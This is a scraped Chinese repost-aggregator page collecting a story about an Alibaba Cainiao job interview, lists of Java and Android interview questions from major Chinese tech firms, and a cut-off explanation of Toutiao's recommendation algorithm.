...表本站的立场。作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。前阵子，小天的同事程序员H偷偷的向阿里菜鸟投递了自己的简历... 不久后程序员H就收到了阿里菜鸟的面试通知，经历5轮面试，一举成功拿下offer并定级P6。小天趁着未来的阿里大佬还在身边，向程序员H讨教了一下面试阿里菜鸟的经验，于是有了下面的情景：小天把程序员H叫到了公司外面的阳台上，伸手递了一根相思鸟。小天(小声地)：大佬，你那边准备什么时候入职哇？程序员H：唉~不知道呀，我想尽早过去，但是这边离职流程走下来至少也得一个月，难搞哦！小天：确实，以大佬你的能力，在这里一个月才拿8.5k实在是有点屈才了... 程序员H：嘘~小声点，公司不让谈论薪资的，你还想不想混了。我之前是跟老板提了三次涨薪，可老板一推再推，说是我以后在公司的前途无可限量，不要总是局限于眼前的这点工资说完，程序员H望着远方，吐了一个烟圈，随着烟圈的远去，变得越来越大。程序员H(指着烟圈)：老板给我画的饼呐，就是这个烟圈里看到的世界，大得很...对了，咱两差不多大，我看，你也尽快跳了吧！小天：嘿嘿，有想过，但是能力不够，跳不得跳不得... 程序员H：啥跳不得啊？多看点技术书籍就差不多了小天：唉~就是不喜欢看书，对了，大佬，你这次去面试问了些什么啊？很好奇阿里是怎么面试的，有哪些环节？程序员H(突然振作精神)：我跟你讲啊，不得不说，这大公司到底是大公司，规范得很。我面试的时候加HR面，一共有5轮，大概回忆一下... 一面 (电话面试) 介绍自己比较熟悉的项目和项目中遇到的难点 Springbean生命周期谈谈依赖注入和面向切面 HashMap原理和扩容机制常用并发包下的类 Redis持久化方式，为什么这么快？自己平时如何提升的，看书或者网站？二面 Jvm类加载机制，分别每一步做了什么工作？ Jvm内存模型，垃圾回收机制，如何确定被清除的对象？了解哪些垃圾回收器和区别？多线程相关，线程池的参数列表和拒绝策略 Jvm如何分析出哪个对象上锁？ Mysql索引类型和区别，事务的隔离级别和事务原理 Spring scope 和设计模式 Sql优化三面 fullgc的时候会导致接口的响应速度特别慢，该如何排查和解决？项目内存或者CPU占用率过高如何排查？ ConcurrentHashmap原理数据库分库分表 MQ相关，为什么kafka这么快，什么是零拷贝？小算法题 http和https协议区别，具体原理四面(Leader) 手画自己项目的架构图，并且针对架构和中间件提问印象最深的一本技术书籍是什么？五面(HR) 没什么过多的问题，主要就是聊了一下自己今后的职业规划，告知了薪资组成体系等等。插播一条福利！！！最近整理了一套1000道面试题的文档(详细内容见文首推荐文章)，以及大厂面试真题，和最近看的几本书。需要刷题和跳槽的朋友，这些可以免费赠送给大家，帮忙转发文章，宣传一下，后台私信【面试】免费领取！小天：好像问了两次看书的情况诶？现在面试还问这个？程序员H：是啊，幸亏之前为了弄懂JVM还看了两本书，不然真不知道说啥了！小天：看来，我也要找几本书去看了，感情没看过两本书都不敢跳槽了！程序员H：对了，还有简历，告诉你一个捷径简历尽量写好一些，项目经验突出： 1、自己的知识广度和深度 2、自身的优势 3、项目的复杂性和难度以及指标 4、自己对于项目做的贡献或者优化程序员H：唉~这还不能走可怎么办呀！你说，我把主管打一顿，是不是马上就可以走了？小天：... 查看全文 http://www.taodudu.cc/news/show-3387369.html 相关文章：阿里菜鸟面经 Java后端开发社招三年已拿offer 阿里菜鸟网络(一面) 2021年阿里菜鸟网络春招实习岗面试分享，简历+面试+面经全套资料！阿里菜鸟国际Java研发面经(三面+总结):JVM+架构+MySQL+Redis等 2021年3月29日阿里菜鸟实习面试（一面）（含部分总结） mongodb 子文档排序_猫鼬101：基础知识，子文档和人口简介特征工程计算方法Gauss-Jordan消去法求线性方程组的解使用(VAE)生成建模,理解可变自动编码器背后的数学原理视觉SLAM入门 -- 学习笔记 - Part2 带你入门nodejs第一天——node基础语法及使用 python3数据结构_Python3-数据结构 debezium-connect-oracle使用相关数值分析多种算法代码 android iphone treeview,Android之IphoneTreeView带组指示器的ExpandableListView效果 nginx rewrite功能使用 3-3 OneHot编码 JavaWeb：shiro入门小案例 MySQL的定义、操作、控制、查询语言的用法 MongoDB入门学习(三)：MongoDB的增删查改赋值、浅复制和深复制解析以及get/set应用他是吴恩达导师，被马云聘为「达摩院」首座 Jordan 标准型定理列主元的Gauss-Jordan消元法-python实现 Jordan 块的几何若尔当型（The Jordan form）第七章其他神经网络类型解决迁移系统后无法配置启用WindowsRE环境的问题宝塔面板迁移系统盘/www到数据盘/home 使用vmware vconverter从物理机迁移系统到虚拟机P2V 本篇文章为转载内容。原文链接：https://blog.csdn.net/m0_62695120/article/details/124510157。该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

2023-03-08 20:01:49

转载

转载文章

[转载]java培训后好找工作吗

...表本站的立场。作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。前言今年因为这个疫情，感觉这是从工作以来过的最久的一个年了，在家呆的时间不是一般的久，算一算有好几个月呢！我大概是3月底快4月了才出门，投了超多的简历，天天面试面试面试面试面试面试面试…庆幸的是还是上岸了（嘻嘻开心开心）。但其实所谓的庆幸也是靠努力堆起来的，我记忆力还比较好，背一背，没啥难的，背了1000道题。。。（注：关于我背的这1000题，文末有分享）眼看着6月就过去了，再过两天就7月份了，想着面试大军可能也过不了几天就要来了，所以这两天整理了一些面经，今天给大家看的是“美团+字节跳动+腾讯”这三家的，每家一二三面，我想大家可以自己测试一下能坚持到哪里。 01 阿里中间件（四面，Java岗） 1.1 Java中间件一面技术一面考察范围重点问了Java线程锁：synchronized 和ReentrantLock相关的底层实现线程池的底层实现以及常见的参数数据结构基本都问了一遍：链表、队列等 Java内存模型：常问的JVM分代模型，以及JDK1.8后的区别，最后还问了JVM相关的调优参数分布式锁的实现比较技术一面题目自我介绍擅长哪方面的技术？ java有哪些锁中类？（乐观锁&悲观锁、可重入锁&Synchronize等）。比较重要的数据结构，如链表，队列，栈的基本原理及大致实现 J.U.C下的常见类的使用。Threadpool的深入考察；blockingQueue的使用 Java内存分代模型，GC算法，JVM常见的启动参数；CMS算法的过程。 Volatile关键字有什么用（包括底层原理）线程池的调优策略 Spring cloud的服务注册与发现是怎么设计的？分布式系统的全局id如何实现分布式锁的方案，redis和zookeeper那个好，如果是集群部署，高并发情况下那个性能更好。 1.2 Java中间件二面技术二面考察范围：问了项目相关的技术实现细节数据库相关：索引、索引底层实现、mysql相关的行锁、表锁等 redis相关：架构设计、数据一致性问题容器:容器的设计原理等技术二面题目：参与的项目，选一个，技术难度在哪里？ Collections.sort底层排序方式负载均衡的原理设计模式与重构，谈谈你对重构的理解谈谈redis相关的集群有哪些成熟方案？再谈谈一致hash算法（redis）？数据库索引，B+树的特性和建树过程 Mysql相关的行锁，表锁；乐观锁，悲观锁谈谈多线程和并发工具的使用谈谈redis的架构和组件 Redis的数据一致性问题（分布式多节点环境&单机环境） Docker容器 1.3 Java中间件三面技术三面考察范围：主要谈到了高并发的实现方案以及中间件：redis、rocketmq、kafka等的架构设计思路最后问了平时怎么提升技术的技术三面题目高并发情况下，系统是如何支撑大量的请求的？接着上面的问题，延伸到了中间件，kafka、redis、rocketmq、mycat等设计思路和适用场景等最近上过哪些技术网站；最近再看那些书。工作和生活中遇见最大的挑战，怎么去克服？未来有怎样的打算 1.4 Java中间件四面最后，你懂的，主要就是HR走流程了，主要问了未来的职业规划。 02 头条Java后台3面 2.1 头条一面讲讲jvm运行时数据库区讲讲你知道的垃圾回收算法 jvm内存模型jmm 内存泄漏与内存溢出的区别 select、epool 的区别？底层的数据结构是什么？ mysql数据库默认存储引擎，有什么优点优化数据库的方法，从sql到缓存到cpu到操作系统，知道多少说多少什么情景下做分表，什么情景下做分库 linkedList与arrayList区别适用场景 array list是如何扩容的 volatile 关键字的作用？Java 内存模型？ java lock的实现，公平锁、非公平锁悲观锁和乐观锁，应用中的案例，mysql当中怎么实现，java中的实现 2.2 头条二面 Java 内存分配策略？多个线程同时请求内存，如何分配？ Redis 底层用到了哪些数据结构？使用 Redis 的 set 来做过什么？ Redis 使用过程中遇到什么问题？搭建过 Redis 集群吗？如何分析“慢查询”日志进行 SQL/索引优化？ MySQL 索引结构解释一下？（B+ 树） MySQL Hash 索引适用情况？举下例子？ 2.3 头条三面如何保证数据库与redis缓存一致的Redis 的并发竞争问题是什么？如何解决这个问题？了解 Redis 事务的 CAS 方案吗？如何保证 Redis 高并发、高可用？ Redis 的主从复制原理，以及Redis 的哨兵原理？如果让你写一个消息队列，该如何进行架构设计啊？说一下你的思路。 MySQL数据库主从同步怎么实现？秒杀模块怎么设计的，如何压测，抗压手段 03 今日头条Java后台研发三面 3.1 一面 concurrent包下面用过哪些？ countdownlatch功能实现 synchronized和lock区别，重入锁thread和runnable的区别 AtomicInteger实现原理(CAS自旋) java并发sleep与wait、notify与notifyAll的区别如何实现高效的同步链表 java都有哪些加锁方式（synchronized、ReentrantLock、共享锁、读写锁等）设计模式（工厂模式、单例模式（几种情况）、适配器模式、装饰者模式） maven依赖树，maven的依赖传递，循环依赖 3.2 二面 synchronized和reentrantLock的区别，synchronized用在代码快、方法、静态方法时锁的都是什么? 介绍spring的IOC和AOP，分别如何实现(classloader、动态代理)JVM的内存布局以及垃圾回收原理及过程讲一下，讲一下CMS垃圾收集器垃圾回收的流程，以及CMS的缺点 redis如何处理分布式服务器并发造成的不一致OSGi的机制spring中bean加载机制，bean生成的具体步骤，ioc注入的方式spring何时创建- applicationContextlistener是监听哪个事件？介绍ConcurrentHashMap原理，用的是哪种锁，segment有没可能增大? 解释mysql索引、b树，为啥不用平衡二叉树、红黑树 Zookeeper如何同步配置 3.3 三面 Java线程池ThreadPoolEcecutor参数，基本参数，使用场景 MySQL的ACID讲一下，延伸到隔离级别 dubbo的实现原理，说说RPC的要点 GC停顿原因，如何降低停顿？ JVM如何调优、参数怎么调？如何用工具分析jvm状态（visualVM看堆中对象的分配，对象间的引用、是否有内存泄漏，jstack看线程状态、是否死锁等等）描述一致性hash算法分布式雪崩场景如何避免? 再谈谈消息队列 04 抖音Java 三面 4.1 一面： hashmap，怎么扩容，怎么处理数据冲突？怎么高效率的实现数据迁移？ Linux的共享内存如何实现，大概说了一下。 socket网络编程，说一下TCP的三次握手和四次挥手同步IO和异步IO的区别？ Java GC机制？GC Roots有哪些？红黑树讲一下，五个特性，插入删除操作,时间复杂度？快排的时间复杂度，最坏情况呢，最好情况呢，堆排序的时间复杂度呢，建堆的复杂度是多少 4.2 二面：自我介绍，主要讲讲做了什么和擅长什么设计模式了解哪些？ AtomicInteger怎么实现原子修改的？ ConcurrentHashMap 在Java7和Java8中的区别？为什么Java8并发效率更好？什么情况下用HashMap，什么情况用ConcurrentHashMap？ redis数据结构？ redis数据淘汰机制？ 4.3 三面（约五十分钟）： mysql实现事务的原理(MVCC) MySQL数据主从同步是如何实现的？ MySQL索引的实现，innodb的索引，b+树索引是怎么实现的，为什么用b+树做索引节点，一个节点存了多少数据，怎么规定大小，与磁盘页对应。如果Redis有1亿个key，使用keys命令是否会影响线上服务？ Redis的持久化方式，aod和rdb，具体怎么实现，追加日志和备份文件，底层实现原理的话知道么? 遇到最大困难是什么？怎么克服？未来的规划是什么？你想问我什么？ 05 百度三面 5.1 百度一面自我介绍 Java中的多态为什么要同时重写hashcode和equals Hashmap的原理 Hashmap如何变线程安全，每种方式的优缺点垃圾回收机制 Jvm的参数你知道的说一下设计模式了解的说一下啊手撕一个单例模式手撕算法：反转单链表手撕算法：实现类似微博子结构的数据结构，输入一系列父子关系，输出一个类似微博评论的父子结构图手写java多线程手写java的soeket编程，服务端和客户端手撕算法：爬楼梯，写出状态转移方程智力题：时针分针什么时候重合 5.2 百度二面（现场）自我介绍项目介绍服务器如何负载均衡，有哪些算法，哪个比较好，一致性哈希原理，怎么避免DDOS攻击请求打到少数机器。 TCP连接中的三次握手和四次挥手，四次挥手的最后一个ack的作用是什么，为什么要time wait，为什么是2msl。数据库的备份和恢复怎么实现的，主从复制怎么做的，什么时候会出现数据不一致，如何解决。 Linux查看cpu占用率高的进程手撕算法：给定一个数字三角形，找到从顶部到底部的最小路径和。每一步可以移动到下面一行的相邻数字上。然后继续在这个问题上扩展求出最短那条的路径递归求出所有的路径设计模式讲一下熟悉的会不会滥用设计模式多线程条件变量为什么要在while体里你遇到什么挫折，怎么应对和处理 5.3 百度三面（现场）自我介绍项目介绍 Redis的特点 Redis的持久化怎么做，aof和rdb，有什么区别，有什么优缺点。 Redis使用哨兵部署会有什么问题，我说需要扩容的话还是得集群部署。说一下JVM内存模型把，有哪些区，分别干什么的说一下gc算法，分代回收说下 MySQL的引擎讲一下，有什么区别，使用场景呢分布式事务了解么反爬虫的机制，有哪些方式 06 蚂蚁中间件团队面试题 6.1 蚂蚁中间件一面：自我介绍 JVM垃圾回收算法和垃圾回收器有哪些，最新的JDK采用什么算法。新生代和老年代的回收机制。讲一下ArrayList和linkedlist的区别，ArrayList与HashMap的扩容方式。 Concurrenthashmap1.8后的改动。 Java中的多线程，以及线程池的增长策略和拒绝策略了解么。 Tomcat的类加载器了解么 Spring的ioc和aop，Springmvc的基本架构，请求流程。 HTTP协议与Tcp有什么区别，http1.0和2.0的区别。 Java的网络编程，讲讲NIO的实现方式，与BIO的区别，以及介绍常用的NIO框架。索引什么时候会失效变成全表扫描介绍下分布式的paxos和raft算法 6.2 蚂蚁中间件二面你在项目中怎么用到并发的。消息队列的使用场景，谈谈Kafka。你说了解分布式服务，那么你怎么理解分布式服务。 Dubbo和Spring Clound的区别，以及使用场景。讲一下docker的实现原理，以及与JVM的区别。 MongoDB、Redis和Memcached的应用场景，各自优势 MongoDB有事务吗 Redis说一下sorted set底层原理讲讲Netty为什么并发高，相关的核心组件有哪些 6.3 蚂蚁中间件三面完整的画一个分布式集群部署图，从负载均衡到后端数据库集群。分布式锁的方案，Redis和Zookeeper哪个好，如果是集群部署，高并发情况下哪个性能更好。分布式系统的全局id如何实现。数据库万级变成亿级，你如何来解决。常见的服务器雪崩是由什么引起的，如何来防范。异地容灾怎么实现常用的高并发技术解决方案有哪些，以及对应的解决步骤。 07 京东4面(Java研发） 7.1 一面（基础面：约1小时）自我介绍，主要讲讲做了什么和擅长什么 springmvc和spring-boot区别 @Autowired的实现原理 Bean的默认作用范围是什么？其他的作用范围？索引是什么概念有什么作用？MySQL里主要有哪些索引结构？哈希索引和B+树索引比较？ Java线程池的原理？线程池有哪些？线程池工厂有哪些线程池类型，及其线程池参数是什么？ hashmap原理，处理哈希冲突用的哪种方法？还知道什么处理哈希冲突的方法？ Java GC机制？GC Roots有哪些？ Java怎么进行垃圾回收的？什么对象会进老年代？垃圾回收算法有哪些？为什么新生代使用复制算法？ HashMap的时间复杂度？HashMap中Hash冲突是怎么解决的？链表的上一级结构是什么？Java8中的HashMap有什么变化？红黑树需要比较大小才能进行插入，是依据什么进行比较的？其他Hash冲突解决方式？ hash和B+树的区别？分别应用于什么场景？哪个比较好？项目里有个数据安全的，aes和md5的区别？详细点 7.2 二面（问数据库较多）自我介绍为什么MyISAM查询性能好？事务特性（acid）隔离级别 SQL慢查询的常见优化步骤？说下乐观锁，悲观锁（select for update），并写出sql实现 TCP协议的三次握手和四次挥手过程？用到过哪些rpc框架数据库连接池怎么实现 Java web过滤器的生命周期 7.3 三面（综合面；约一个小时）自我介绍。 ConcurrentHashMap 在Java7和Java8中的区别？为什么Java8并发效率更好？什么情况下用HashMap，什么情况用ConcurrentHashMap？加锁有什么机制？ ThreadLocal？应用场景？数据库水平切分，垂直切分的设计思路和切分顺序 Redis如何解决key冲突 soa和微服务的区别？单机系统演变为分布式系统，会涉及到哪些技术的调整？请从前面负载到后端详细描述。设计一个秒杀系统？ 7.4 四面（HR面）你自己最大优势和劣势是什么平时遇见过什么样的挑战，怎么去克服的工作中遇见了技术解决不了的问题，你的应对思路？你的兴趣爱好？未来的职业规划是什么？ 08 美团java高级开发3面 8.1 美团一面自我介绍项目介绍 Redis介绍了解redis源码么了解redis集群么 Hashmap的原理，增删的情况后端数据结构如何位移 hashmap容量为什么是2的幂次 hashset的源码 object类你知道的方法 hashcode和equals 你重写过hashcode和equals么，要注意什么假设现在一个学生类，有学号和姓名，我现在hashcode方法重写的时候，只将学号参与计算，会出现什么情况？往set里面put一个学生对象，然后将这个学生对象的学号改了，再put进去，可以放进set么？并讲出为什么 Redis的持久化？有哪些方式，原理是什么？讲一下稳定的排序算法和不稳定的排序算法讲一下快速排序的思想 8.2 美团二面自我介绍讲一下数据的acid 什么是一致性什么是隔离性 Mysql的隔离级别每个隔离级别是如何解决 Mysql要加上nextkey锁，语句该怎么写 Java的内存模型，垃圾回收线程池的参数每个参数解释一遍然后面试官设置了每个参数，给了是个线程，让描述出完整的线程池执行的流程 Nio和IO有什么区别 Nio和aio的区别 Spring的aop怎么实现 Spring的aop有哪些实现方式动态代理的实现方式和区别 Linux了解么怎么查看系统负载 Cpu load的参数如果为4，描述一下现在系统处于什么情况 Linux，查找磁盘上最大的文件的命令 Linux，如何查看系统日志文件手撕算法：leeetcode原题 22，Generate Parentheses，给定 n 对括号，请- 写一个函数以将其生成新的括号组合，并返回所有组合结果。 8.3 美团三面（现场）三面没怎么问技术，问了很多技术管理方面的问题自我介绍项目介绍怎么管理项目成员当意见不一致时，如何沟通并说服开发成员，并举个例子怎么保证项目的进度数据库的索引原理非聚簇索引和聚簇索引索引的使用注意事项联合索引从底层解释最左匹配原则 Mysql对联合索引有优化么？会自动调整顺序么？哪个版本开始优化？ Redis的应用 Redis的持久化的方式和原理技术选型，一个新技术和一个稳定的旧技术，你会怎么选择，选择的考虑有哪些说你印象最深的美团点评技术团队的三篇博客最近在学什么新技术你是怎么去接触一门新技术的会看哪些书怎么选择要看的书最后由于篇幅限制，小编在此截出几张知识讲解的图解，有需要的程序猿（媛）可以点赞后戳这里免费领取全部资料获取哦子怎么保证项目的进度数据库的索引原理非聚簇索引和聚簇索引索引的使用注意事项联合索引从底层解释最左匹配原则 Mysql对联合索引有优化么？会自动调整顺序么？哪个版本开始优化？ Redis的应用 Redis的持久化的方式和原理技术选型，一个新技术和一个稳定的旧技术，你会怎么选择，选择的考虑有哪些说你印象最深的美团点评技术团队的三篇博客最近在学什么新技术你是怎么去接触一门新技术的会看哪些书怎么选择要看的书最后由于篇幅限制，小编在此截出几张知识讲解的图解，有需要的程序猿（媛）可以点赞后戳这里免费领取全部资料获取哦 [外链图片转存中…(img-SFREePIJ-1624074891834)] [外链图片转存中…(img-5kF3pkiC-1624074891834)] [外链图片转存中…(img-HDVXfOMR-1624074891835)] [外链图片转存中…(img-RyaAC5jy-1624074891836)] [外链图片转存中…(img-iV32C5Ok-1624074891837)] 本篇文章为转载内容。原文链接：https://blog.csdn.net/m0_57285325/article/details/118051767。该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

2023-11-13 23:43:59

转载

转载文章

[转载]Android面试实战总结

...论了如何通过优化内存管理、避免内存泄露等方式来预防OOM问题，确保应用能够在有限的内存资源下流畅运行。 ListView优化 , ListView是Android SDK中提供的一个用于展示大量数据列表的UI组件，它支持滚动和视图重用机制以提高性能。然而，如果不进行适当的优化，当加载大量数据时可能会出现卡顿、延迟或内存溢出等问题。文章中的面试过程涉及到了ListView优化的关键点，如复用convertView以减少对象创建、减少findViewById调用次数、分页加载数据以及图片缓存策略等，这些措施都是为了提升ListView的滚动流畅度和整体性能。图片三级缓存机制 , 在移动应用尤其是Android应用开发中，图片资源的高效管理和加载对于用户体验至关重要。三级缓存机制是一种常见的优化手段，主要包括内存缓存、本地缓存（文件缓存）和网络缓存三层结构。当需要加载图片时，首先检查内存缓存中是否存在该图片，若存在则直接使用；若不存在，则查询本地缓存，如果找到则从本地读取并加载至内存缓存；若本地也未存储，则发起网络请求下载图片，并将下载后的图片同时保存至内存缓存和本地缓存，以便后续快速访问。这样做的目的是减少对网络带宽和内存资源的消耗，防止因频繁加载图片导致的卡顿、延迟甚至OOM问题，提升应用性能和用户体验。在文中，面试者详细介绍了自己如何利用这一机制来优化项目中的图片处理部分。

2023-06-19 17:42:52

336

转载

转载文章

[转载]今日头条、抖音推荐算法原理全文详解！

...表本站的立场。作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。本文来源于今日头条：本次分享将主要介绍今日头条推荐系统概览以及内容分析、用户标签、评估分析，内容安全等原理。一、系统概览推荐系统，如果用形式化的方式去描述实际上是拟合一个用户对内容满意度的函数，这个函数需要输入三个维度的变量。第一个维度是内容。头条现在已经是一个综合内容平台，图文、视频、UGC小视频、问答、微头条，每种内容有很多自己的特征，需要考虑怎样提取不同内容类型的特征做好推荐。第二个维度是用户特征。包括各种兴趣标签，职业、年龄、性别等，还有很多模型刻划出的隐式用户兴趣等。第三个维度是环境特征。这是移动互联网时代推荐的特点，用户随时随地移动，在工作场合、通勤、旅游等不同的场景，信息偏好有所偏移。结合三方面的维度，模型会给出一个预估，即推测推荐内容在这一场景下对这一用户是否合适。这里还有一个问题，如何引入无法直接衡量的目标？推荐模型中，点击率、阅读时间、点赞、评论、转发包括点赞都是可以量化的目标，能够用模型直接拟合做预估，看线上提升情况可以知道做的好不好。但一个大体量的推荐系统，服务用户众多，不能完全由指标评估，引入数据指标以外的要素也很重要。比如广告和特型内容频控。像问答卡片就是比较特殊的内容形式，其推荐的目标不完全是让用户浏览，还要考虑吸引用户回答为社区贡献内容。这些内容和普通内容如何混排，怎样控制频控都需要考虑。此外，平台出于内容生态和社会责任的考量，像低俗内容的打压，标题党、低质内容的打压，重要新闻的置顶、加权、强插，低级别账号内容降权都是算法本身无法完成，需要进一步对内容进行干预。下面我将简单介绍在上述算法目标的基础上如何对其实现。前面提到的公式y = F(Xi ,Xu ,Xc)，是一个很经典的监督学习问题。可实现的方法有很多，比如传统的协同过滤模型，监督学习算法Logistic Regression模型，基于深度学习的模型，Factorization Machine和GBDT等。一个优秀的工业级推荐系统需要非常灵活的算法实验平台，可以支持多种算法组合，包括模型结构调整。因为很难有一套通用的模型架构适用于所有的推荐场景。现在很流行将LR和DNN结合，前几年Facebook也将LR和GBDT算法做结合。今日头条旗下几款产品都在沿用同一套强大的算法推荐系统，但根据业务场景不同，模型架构会有所调整。模型之后再看一下典型的推荐特征，主要有四类特征会对推荐起到比较重要的作用。第一类是相关性特征，就是评估内容的属性和与用户是否匹配。显性的匹配包括关键词匹配、分类匹配、来源匹配、主题匹配等。像FM模型中也有一些隐性匹配，从用户向量与内容向量的距离可以得出。第二类是环境特征，包括地理位置、时间。这些既是bias特征，也能以此构建一些匹配特征。第三类是热度特征。包括全局热度、分类热度，主题热度，以及关键词热度等。内容热度信息在大的推荐系统特别在用户冷启动的时候非常有效。第四类是协同特征，它可以在部分程度上帮助解决所谓算法越推越窄的问题。协同特征并非考虑用户已有历史。而是通过用户行为分析不同用户间相似性，比如点击相似、兴趣分类相似、主题相似、兴趣词相似，甚至向量相似，从而扩展模型的探索能力。模型的训练上，头条系大部分推荐产品采用实时训练。实时训练省资源并且反馈快，这对信息流产品非常重要。用户需要行为信息可以被模型快速捕捉并反馈至下一刷的推荐效果。我们线上目前基于storm集群实时处理样本数据，包括点击、展现、收藏、分享等动作类型。模型参数服务器是内部开发的一套高性能的系统，因为头条数据规模增长太快，类似的开源系统稳定性和性能无法满足，而我们自研的系统底层做了很多针对性的优化，提供了完善运维工具，更适配现有的业务场景。目前，头条的推荐算法模型在世界范围内也是比较大的，包含几百亿原始特征和数十亿向量特征。整体的训练过程是线上服务器记录实时特征，导入到Kafka文件队列中，然后进一步导入Storm集群消费Kafka数据，客户端回传推荐的label构造训练样本，随后根据最新样本进行在线训练更新模型参数，最终线上模型得到更新。这个过程中主要的延迟在用户的动作反馈延时，因为文章推荐后用户不一定马上看，不考虑这部分时间，整个系统是几乎实时的。但因为头条目前的内容量非常大，加上小视频内容有千万级别，推荐系统不可能所有内容全部由模型预估。所以需要设计一些召回策略，每次推荐时从海量内容中筛选出千级别的内容库。召回策略最重要的要求是性能要极致，一般超时不能超过50毫秒。召回策略种类有很多，我们主要用的是倒排的思路。离线维护一个倒排，这个倒排的key可以是分类，topic，实体，来源等。排序考虑热度、新鲜度、动作等。线上召回可以迅速从倒排中根据用户兴趣标签对内容做截断，高效的从很大的内容库中筛选比较靠谱的一小部分内容。二、内容分析内容分析包括文本分析，图片分析和视频分析。头条一开始主要做资讯，今天我们主要讲一下文本分析。文本分析在推荐系统中一个很重要的作用是用户兴趣建模。没有内容及文本标签，无法得到用户兴趣标签。举个例子，只有知道文章标签是互联网，用户看了互联网标签的文章，才能知道用户有互联网标签，其他关键词也一样。另一方面，文本内容的标签可以直接帮助推荐特征，比如魅族的内容可以推荐给关注魅族的用户，这是用户标签的匹配。如果某段时间推荐主频道效果不理想，出现推荐窄化，用户会发现到具体的频道推荐（如科技、体育、娱乐、军事等）中阅读后，再回主feed,推荐效果会更好。因为整个模型是打通的，子频道探索空间较小，更容易满足用户需求。只通过单一信道反馈提高推荐准确率难度会比较大，子频道做的好很重要。而这也需要好的内容分析。上图是今日头条的一个实际文本case。可以看到，这篇文章有分类、关键词、topic、实体词等文本特征。当然不是没有文本特征，推荐系统就不能工作，推荐系统最早期应用在Amazon,甚至沃尔玛时代就有，包括Netfilx做视频推荐也没有文本特征直接协同过滤推荐。但对资讯类产品而言，大部分是消费当天内容，没有文本特征新内容冷启动非常困难，协同类特征无法解决文章冷启动问题。今日头条推荐系统主要抽取的文本特征包括以下几类。首先是语义标签类特征，显式为文章打上语义标签。这部分标签是由人定义的特征，每个标签有明确的意义，标签体系是预定义的。此外还有隐式语义特征，主要是topic特征和关键词特征，其中topic特征是对于词概率分布的描述，无明确意义；而关键词特征会基于一些统一特征描述，无明确集合。另外文本相似度特征也非常重要。在头条，曾经用户反馈最大的问题之一就是为什么总推荐重复的内容。这个问题的难点在于，每个人对重复的定义不一样。举个例子，有人觉得这篇讲皇马和巴萨的文章，昨天已经看过类似内容，今天还说这两个队那就是重复。但对于一个重度球迷而言，尤其是巴萨的球迷，恨不得所有报道都看一遍。解决这一问题需要根据判断相似文章的主题、行文、主体等内容，根据这些特征做线上策略。同样，还有时空特征，分析内容的发生地点以及时效性。比如武汉限行的事情推给北京用户可能就没有意义。最后还要考虑质量相关特征，判断内容是否低俗，色情，是否是软文，鸡汤？上图是头条语义标签的特征和使用场景。他们之间层级不同，要求不同。分类的目标是覆盖全面，希望每篇内容每段视频都有分类；而实体体系要求精准，相同名字或内容要能明确区分究竟指代哪一个人或物，但不用覆盖很全。概念体系则负责解决比较精确又属于抽象概念的语义。这是我们最初的分类，实践中发现分类和概念在技术上能互用，后来统一用了一套技术架构。目前，隐式语义特征已经可以很好的帮助推荐，而语义标签需要持续标注，新名词新概念不断出现，标注也要不断迭代。其做好的难度和资源投入要远大于隐式语义特征，那为什么还需要语义标签？有一些产品上的需要，比如频道需要有明确定义的分类内容和容易理解的文本标签体系。语义标签的效果是检查一个公司NLP技术水平的试金石。今日头条推荐系统的线上分类采用典型的层次化文本分类算法。最上面Root，下面第一层的分类是像科技、体育、财经、娱乐，体育这样的大类，再下面细分足球、篮球、乒乓球、网球、田径、游泳…，足球再细分国际足球、中国足球，中国足球又细分中甲、中超、国家队…，相比单独的分类器，利用层次化文本分类算法能更好地解决数据倾斜的问题。有一些例外是，如果要提高召回，可以看到我们连接了一些飞线。这套架构通用，但根据不同的问题难度，每个元分类器可以异构，像有些分类SVM效果很好，有些要结合CNN，有些要结合RNN再处理一下。上图是一个实体词识别算法的case。基于分词结果和词性标注选取候选，期间可能需要根据知识库做一些拼接，有些实体是几个词的组合，要确定哪几个词结合在一起能映射实体的描述。如果结果映射多个实体还要通过词向量、topic分布甚至词频本身等去歧，最后计算一个相关性模型。三、用户标签内容分析和用户标签是推荐系统的两大基石。内容分析涉及到机器学习的内容多一些，相比而言，用户标签工程挑战更大。今日头条常用的用户标签包括用户感兴趣的类别和主题、关键词、来源、基于兴趣的用户聚类以及各种垂直兴趣特征（车型，体育球队，股票等）。还有性别、年龄、地点等信息。性别信息通过用户第三方社交账号登录得到。年龄信息通常由模型预测，通过机型、阅读时间分布等预估。常驻地点来自用户授权访问位置信息，在位置信息的基础上通过传统聚类的方法拿到常驻点。常驻点结合其他信息，可以推测用户的工作地点、出差地点、旅游地点。这些用户标签非常有助于推荐。当然最简单的用户标签是浏览过的内容标签。但这里涉及到一些数据处理策略。主要包括：一、过滤噪声。通过停留时间短的点击，过滤标题党。二、热点惩罚。对用户在一些热门文章（如前段时间PG 